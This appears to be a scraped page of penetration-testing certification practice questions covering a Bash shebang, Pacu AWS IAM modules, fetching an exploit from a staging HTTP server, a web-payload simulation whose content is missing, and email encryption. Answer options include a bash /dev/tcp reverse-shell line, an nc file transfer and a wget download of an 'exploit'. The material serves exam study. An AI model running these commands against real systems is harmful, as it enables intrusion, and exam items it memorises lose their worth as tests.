When developing a shell script intended for interpretation in Bash, the interpreter /bin/bash should be explicitly specified. Which of the following character combinations should be used on the first line of the script to accomplish this goal?

• A.##
• B.<#
• C.<$
• D.#!
• E.#$

Comment: *

Name: *

Email: *

Verification: *

A penetration tester logs in as a user in the cloud environment of a company. Which of the following Pacu modules will enable the tester to determine the level of access of the existing user?

• A.iam_backdoor_assume_role
• B.iam_enum_permissions
• C.iam_bruteforce_permissions
• D.iam_privesc_scan

Comment: *

Name: *

Email: *

Verification: *

A penetration tester ran the following command on a staging server:
python -m SimpleHTTPServer 9891
Which of the following commands could be used to download a file named exploit to a target machine for execution?

• A.powershell -exec bypass -f \\10.10.51.50\9891
• B.nc 10.10.51.50 9891 < exploit
• C.wget 10.10.51.50:9891/exploit
• D.bash -i >& /dev/tcp/10.10.51.50/9891 0&1>/exploit

Comment: *

Name: *

Email: *

Verification: *

You are a security analyst tasked with hardening a web server.
You have been given a list of HTTP payloads that were flagged as malicious.
INSTRUCTIONS
Given the following attack signatures, determine the attack type, and then identify the associated remediation to prevent the attack in the future.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Correct Answer:

Comment: *

Name: *

Email: *

Verification: *

Which of the following protocols or technologies would provide in-transit confidentiality protection for emailing the final security assessment report?

• A.S/MIME
• B.DNSSEC
• C.AS2
• D.FTPS

Comment: *

Name: *

Email: *

Verification: *